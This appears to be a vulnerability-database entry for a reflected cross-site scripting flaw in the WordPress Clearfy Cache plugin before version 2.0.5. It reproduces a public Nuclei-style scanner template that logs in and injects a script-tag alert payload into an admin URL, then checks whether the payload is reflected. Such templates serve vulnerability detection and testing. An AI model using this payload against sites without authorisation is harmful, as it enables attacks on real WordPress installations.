clearfy-cache-xss: WordPress Clearfy Cache <2.0.5 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Clearfy Cache | POC: 已公开

漏洞描述

WordPress Clearfy Cache 2.0.5 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.

PoC代码[已公开]

id: clearfy-cache-xss

info:
  name: WordPress Clearfy Cache <2.0.5 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Clearfy Cache 2.0.5 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
    - https://wordpress.org/plugins/clearfy
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 2
  tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(1)</script>'
          - "Webcraftic Clearfy - WordPress optimization plugin"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f2de9886028a2856da3814fedf1c739a6b55cd0165cb85817757ab5f025985f9022100b4069987ba27469b9ffcdcfe02ba3f2bd636ff51e4bc088707d8efd9c3c1fe1d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐